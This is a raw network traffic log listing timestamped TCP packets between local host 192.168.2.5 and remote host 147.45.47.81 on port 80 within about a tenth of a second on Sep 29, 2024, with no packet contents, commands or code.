                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334439993 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334570885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334610939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334630966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334650040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334692001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334724903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334739923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334767103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334784985 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334923029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334938049 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334960938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334964991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334985971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335001945 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335006952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335027933 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335043907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335045099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335071087 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335082054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335148096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335167885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335186958 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335186958 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335222960 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335300922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335319996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335342884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335355997 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335364103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335400105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335400105 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335431099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335470915 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335561991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335577011 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335604906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335617065 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335623980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335644007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335660934 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335664988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335700989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335705042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335751057 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335767984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335788965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335825920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335844040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335865974 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335876942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335899115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.335916042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336093903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336112022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336134911 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336147070 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336168051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336184978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336185932 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336210012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336225033 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336232901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336252928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336270094 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336273909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336317062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336472988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336493015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336517096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336530924 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336536884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336558104 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336574078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336577892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336599112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336616039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336623907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336642027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336652994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336663008 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.336699963 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337804079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337876081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337893963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337918043 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337944031 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337961912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337982893 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.337986946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338007927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338025093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338092089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338108063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338136911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338135004 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338192940 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338223934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338243961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338268042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338282108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338282108 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338320971 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338363886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338381052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338404894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338418961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338433027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338454962 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338474035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338479042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338500023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338520050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338526964 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338557005 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338726997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338742018 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338767052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338778019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338792086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338814974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338830948 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338859081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338881969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338896990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338900089 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338926077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338953018 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.338987112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339030981 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339116096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339131117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339158058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339171886 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339179039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339200020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339210033 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339221001 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339241982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339256048 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339257002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339271069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339327097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339520931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339540005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339561939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339565039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339582920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339601994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339607954 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339629889 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339644909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339649916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339667082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339692116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339704990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339713097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339726925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339732885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339754105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339771032 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339850903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339890957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339910984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339930058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.339967966 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340059996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340079069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340102911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340112925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340123892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340159893 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340213060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340241909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340261936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340277910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340286016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340306044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340322971 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340323925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340348959 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340362072 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340368986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340389967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340406895 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340617895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340636015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340656996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340660095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340682030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340698004 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340703964 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340724945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340744019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340744972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340763092 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340781927 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340790033 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340827942 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340964079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340979099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.340998888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341006994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341020107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341039896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341058016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341061115 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341083050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341095924 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341100931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341125011 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341135979 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341142893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341175079 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341231108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341276884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341295958 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341316938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341444016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341463089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341479063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341487885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341515064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341525078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341532946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341557026 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341571093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341574907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341598988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341613054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341618061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341638088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341649055 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341658115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341680050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341694117 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341696978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341728926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341743946 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341749907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341770887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341788054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341793060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341814995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341829062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341833115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341856956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.341872931 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342217922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342247009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342258930 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342264891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342288971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342302084 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342309952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342331886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342346907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342351913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342374086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342389107 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342395067 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342415094 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342432976 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342636108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.342653990 CEST8049706147.45.47.81192.168.2.5
